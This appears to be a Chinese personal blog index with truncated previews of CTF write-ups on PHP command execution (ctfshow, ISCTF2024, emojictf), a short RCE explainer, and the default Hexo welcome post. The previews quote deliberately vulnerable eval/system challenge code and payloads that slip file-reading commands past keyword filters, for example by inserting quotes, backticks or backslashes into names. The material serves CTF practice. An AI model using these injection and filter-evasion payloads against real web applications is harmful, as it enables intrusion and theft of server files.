ctfshow中php特性上
PHP特性:89:if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 命令执行:?c=system(‘tac fl*’); 90:if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===4476){ echo $flag; }else{ echo intval($num,0); }...
isctf2024web
ISCTF2024:1z_php:if(isset($_POST['J'])){ $call=$_POST['J']; $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od']; foreach ($dangerous_commands as $command) { if (preg_match("/$command/i", $call)) { die("这些个危险函数可不兴使啊"); } } system($call);}?> J=ls / ...
emojictfweb
emojictfwebRCE:发现f12不能使用,没事,张师傅给我说ctrl+shift+i就可以了,ok.试了试发现没有有用的东西,dirsearch扫描一下发现robots.txt 然后发现 /fl@g.php,查看: <?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET['emo'])){ $emo = $_GET['emo']; if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){ system($emo); } else{ echo "Again"; }}else{ echo...
SHOWRCE
接下来开始我们的RCE刷题SHOW29:if(isset($_GET['c’]));if(!preg_match("/flag/i",$c)){eval($c);}else{highlight file( FILE ); 先看代码分析出来这个是命令执行,让我们get传参c,然后过滤了flag和他的大小写 那么payload就出来了:c=system('tac fl*.php');(也可以使用其他的查看符)其他:c=system('tac fl""ag.php');c=system('tac fl``ag.php');c=system('ta\c fl\ag.php');等等 30:if(isset($_GET['c’])){8c = S GETL'c’]:if(!preg_match("/flag|system|php/i",...
RCE
1.简述:在很多Web应用中,开发人员会使用一些特殊函数,这些函数以一些字符串作为输入,功能是将输入的字符串当作代码或者命令来进行执行。当用户可以控制这些函数的输入时,就产生了RCE漏洞。 危害:可以让用户(通常是系统管理员或普通用户)执行任意系统命令的漏洞。这种漏洞通常存在于某些程序或脚本中,允许输入参数被编码并传递给可执行文件。 ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post$ hexo new "My New Post" More info: Writing Run server$ hexo server More info: Server Generate static files$ hexo generate More info: Generating Deploy to remote sites$ hexo deploy More info: Deployment